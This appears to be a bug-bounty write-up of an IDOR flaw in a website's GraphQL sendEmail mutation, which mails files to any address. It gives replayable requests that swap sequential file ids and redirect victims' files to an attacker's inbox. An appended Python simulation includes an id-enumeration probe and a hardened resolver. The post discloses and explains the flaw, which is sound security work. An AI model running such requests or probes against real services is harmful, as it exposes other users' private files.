IDOR Vulnerability In GraphQL Api On Website

Aidil Arief
3 min read · Sep 2, 2021


Assalamualaikum Bug Hunter & Hello everyone.

In this article I want to share my experience with an Insecure Direct Object Reference (IDOR) finding in a GraphQL API on a website.

Image Source: https://threatpost.com/how-to-bug-bounties/165657/

While testing with the Sandro Proxy tool, I captured the following request to the GraphQL API. Here is the snippet:

[{"operation":"sendEmail","variables":{"[Path]Id":"1002203272","[Path]Hash":"38C09************788Y","lang":"id","emails":["victim@gmail.com"]},"query":"mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n"}]

The request above triggers the "download" of a file: the server retrieves the file identified by the variables and sends it to the email address(es) listed in "emails".

From the GraphQL request above I picked out three parts:

1. "[Path]Id":"1002203272"
2. "[Path]Hash":"38C09************788Y"
Here the website passes both a [Path]Id and a [Path]Hash for the file. I don't know for sure why it was designed this way, but I assume the hash is meant as a second secret: even if an attacker discovers a victim's [Path]Id, they would still need to discover that victim's [Path]Hash. If the server actually enforced that, the design would be well protected against IDOR.

3. "emails":["victim@gmail.com"]
There is nothing suspicious about this part: it is simply the recipient list.

Judging from the request alone, an IDOR looks hard to find, because the website binds a [Path]Id and a [Path]Hash to each file. But in the HTTP exchange I found that the [Path]Hash is never verified, so I reported an Insecure Direct Object Reference (IDOR) vulnerability stemming from a lack of authentication in the GraphQL API. In practice this is a missing authorization check: the resolver never confirms that the caller owns the file referenced by [Path]Id, and the hash that was supposed to prove it is ignored.

Follow me :)

  1. The GraphQL API does not properly authenticate the request when it retrieves the file and sends it to the destination email.
    Why does this happen?
    Because the "sendEmail" operation only checks "[Path]Id" and never checks "[Path]Hash". The hash can be anything (your own, for example) and the request still succeeds.

2. Open Burp Suite or Sandro Proxy and send the request below (the captured request, with your own email as the recipient):

[{"operation":"sendEmail","variables":{"[Path]Id":"1002203272","[Path]Hash":"38C09************788Y","lang":"id","emails":["attacker@gmail.com"]},"query":"mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n"}]

3. In that request:

A. "[Path]Id":"1002203272"

Change this parameter to another file id. The ids are plain sequential numbers, so neighbouring values belong to other users' files. Example:

[+]. "[Path]Id":"1002203272" is the id of my own file (Attacker)

[+]. "[Path]Id":"1002203271" is the id of the victim's file (Victim); other values return other users' files. Leave "[Path]Hash" set to your own hash, since the server never checks it.

B. "emails":["attacker@gmail.com"]

Set this to an email address you control; the victim's file will be sent there.

4. Final request:

[{"operation":"sendEmail","variables":{"[Path]Id":"1002203271","[Path]Hash":"38C09************788Y","lang":"id","emails":["attacker@gmail.com"]},"query":"mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n"}]

5. Check your inbox: the victim's file has been sent to your email.
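To make both points concrete (why the unchecked [Path]Hash gives no protection, and how the id-swapping steps above turn into a repeatable probe), here is an added example that is not part of the original post and not the target's code. It simulates the GraphQL backend in memory with two resolvers: one that mirrors the reported bug (only [Path]Id is used) and one hardened with an ownership check plus a constant-time hash comparison. Everything in it is constructed: the file ids, the hashes, the owner names, the in-memory FILES table and the email addresses are assumptions, and the real operation and field names stay redacted as [Path] exactly as in the post.

```python
"""Replay of the captured sendEmail mutation against a simulated backend.

Constructed example: vulnerable resolver (id only, as reported in the post)
versus hardened resolver (ownership + hash check). No network access.
"""
import hmac
import json
from typing import Callable

# Constructed sample data: two files owned by two different users.
# Ids are sequential, as in the post (1002203272 vs 1002203271).
FILES = {
    "1002203272": {"owner": "attacker", "hash": "A" * 20},
    "1002203271": {"owner": "victim", "hash": "B" * 20},
}

# Every (file id, recipient) the simulated server "emailed" out.
OUTBOX: list[tuple[str, str]] = []

Resolver = Callable[[str, dict], bool]


def build_request(file_id: str, file_hash: str, emails: list[str], lang: str = "id") -> str:
    """Build the batched GraphQL body captured in the post ([Path] kept as a placeholder)."""
    body = [{
        "operation": "sendEmail",
        "variables": {"[Path]Id": file_id, "[Path]Hash": file_hash, "lang": lang, "emails": emails},
        "query": (
            "mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n"
            " sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n"
        ),
    }]
    return json.dumps(body)


def vulnerable_resolver(caller: str, variables: dict) -> bool:
    """The reported bug: the file is looked up by [Path]Id alone; hash and caller are ignored."""
    rec = FILES.get(variables["[Path]Id"])
    if rec is None:
        return False
    for to in variables["emails"]:
        OUTBOX.append((variables["[Path]Id"], to))
    return True


def hardened_resolver(caller: str, variables: dict) -> bool:
    """Fix: the caller must own the file AND present its hash (compared in constant time)."""
    rec = FILES.get(variables["[Path]Id"])
    if rec is None:
        return False
    if rec["owner"] != caller:
        return False  # authorization: not your file
    if not hmac.compare_digest(rec["hash"], variables["[Path]Hash"]):
        return False  # the per-file secret actually has to match
    for to in variables["emails"]:
        OUTBOX.append((variables["[Path]Id"], to))
    return True


def serve(resolver: Resolver, caller: str, raw_body: str) -> list[bool]:
    """Simulate the endpoint: parse the batch and dispatch each sendEmail operation."""
    results = []
    for op in json.loads(raw_body):
        if op.get("operation") != "sendEmail":
            results.append(False)
            continue
        results.append(resolver(caller, op["variables"]))
    return results


def idor_probe(resolver: Resolver, caller: str, own_id: str, own_hash: str,
               attacker_email: str, spread: int = 2) -> list[str]:
    """Steps 2-5 of the post as a loop: replay the mutation with neighbouring ids,
    the attacker's own hash and the attacker's inbox; return the ids the server mailed out."""
    base = int(own_id)
    leaked = []
    for candidate in range(base - spread, base + spread + 1):
        cid = str(candidate)
        if cid == own_id:
            continue
        body = build_request(cid, own_hash, [attacker_email])
        if serve(resolver, caller, body) == [True]:
            leaked.append(cid)
    return leaked


if __name__ == "__main__":
    print("vulnerable:", idor_probe(vulnerable_resolver, "attacker", "1002203272", "A" * 20, "attacker@example.com"))
    print("hardened:  ", idor_probe(hardened_resolver, "attacker", "1002203272", "A" * 20, "attacker@example.com"))
```

Against the vulnerable resolver the probe mails the victim's file (id 1002203271) to the attacker's inbox even though the attacker sent their own hash; against the hardened resolver the same loop yields nothing, while the legitimate owner presenting the right hash still succeeds. Note that the hash check alone would not be enough if hashes were guessable or leaked elsewhere; the ownership check is what actually closes the IDOR.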

Bounty : $$
